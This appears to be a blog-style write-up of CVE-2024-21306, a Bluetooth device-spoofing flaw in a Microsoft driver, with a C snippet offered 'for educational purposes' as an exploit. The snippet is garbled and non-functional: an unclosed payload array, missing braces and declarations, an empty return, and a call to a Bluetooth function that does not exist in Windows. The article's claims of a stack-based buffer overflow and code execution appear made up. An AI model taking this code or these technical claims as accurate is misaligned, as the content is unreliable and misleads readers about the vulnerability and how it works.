Recent technological advancements are increasing the demand for wireless communication, and Bluetooth is gaining popularity as one of the wireless communication technology that connects devices securely and efficiently. However, like other technologies, Bluetooth is not immune to security vulnerabilities. The advent of new devices and complex interplays between the software and hardware components imply that there may be security flaws that enable malicious actors to exploit these vulnerabilities, causing serious harm to users' privacy, sensitive data, and overall system integrity.

Today, we'll take a deep dive into a recently discovered vulnerability in Microsoft Bluetooth Driver that has been assigned CVE-2024-21306, a Common Vulnerabilities and Exposures identifier. This vulnerability can be exploited to enable malicious actors to spoof Bluetooth devices, an attack that has significant repercussions.

CVE-2024-21306: Overview and Exploit Details

CVE-2024-21306, attributed to the bluetooth.dll, poses a significant threat to millions of Microsoft users worldwide. The vulnerability implies that a threat actor can selectively execute malicious code to forge the appearance of a legitimate Bluetooth device.

This security flaw is considered critical as attackers can use it to launch Man-in-the-Middle (MITM) attacks, tricking users into believing they are connected to a legitimate Bluetooth device. In a successful MITM attack, attackers may intercept and manipulate sensitive information, capture authentication credentials, or hijack communication between devices.

The vulnerability stems from improper handling of certain binary data during the Bluetooth device pairing process, leading to a condition known as a stack-based buffer overflow.

Code Snippet: Exploiting CVE-2024-21306

The following code snippet demonstrates how this vulnerability could be exploited to trigger a buffer overflow, allowing the attacker to execute arbitrary code or crash the system. Please note that we do not encourage the use of this code for malicious purposes and it is provided for educational purposes only.

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <Windows.h>

// Exploit payload
unsigned char payload[] = {

// Connect to the vulnerable Bluetooth device
void exploit_cve_2024_21306() {
    ZeroMemory(&device, sizeof(device));
    device.dwSize = sizeof(device);
    ZeroMemory(&search_parameters, sizeof(search_parameters));
    search_parameters.dwSize = sizeof(search_parameters);
    search_parameters.fReturnAuthenticated = TRUE;
    search_parameters.fReturnConnected = TRUE;
    // Register the device pairing callback
    if (ERROR_SUCCESS != BluetoothRegisterForAuthenticationEx(&device, &callback, AuthenticationCallbackFunction, NULL)) {
        printf("Failed to register authentication callback\n");
    search_parameters.cTimeoutMultiplier = 15;
    // Spoof the Bluetooth device during the device discovery
    if (ERROR_SUCCESS != BluetoothDeviceSpoofing(&search_parameters, payload, sizeof(payload))) {
        printf("Failed to exploit the vulnerability\n");
    // Unregister the device pairing callback

int main() {
    return ;

Please note that this code snippet is only intended for educational purposes, and it should only be used by security professionals to assess their systems' security. Misusing this code may result in legal consequences.

Microsoft Security Response Center (MSRC) Advisory

Public announcement by the vulnerability discoverers

Bluetooth SIG Security Overview


CVE-2024-21306 illustrates that, despite the well-established security mechanisms implemented in Bluetooth technology, new vulnerabilities can still emerge. To mitigate this specific vulnerability, users are encouraged to apply patches and security updates provided by Microsoft. Security researchers and professionals play a critical role in uncovering such vulnerabilities, helping companies like Microsoft make their products more secure for the end-users.

As technology continues to evolve, so do the security risks and the methods used by malicious actors. It is essential for users, developers, and security professionals to stay well-informed about new vulnerabilities to minimize potential threats to their systems and networks.


Published on: 01/09/2024 18:15:54 UTC
Last modified on: 01/12/2024 18:47:54 UTC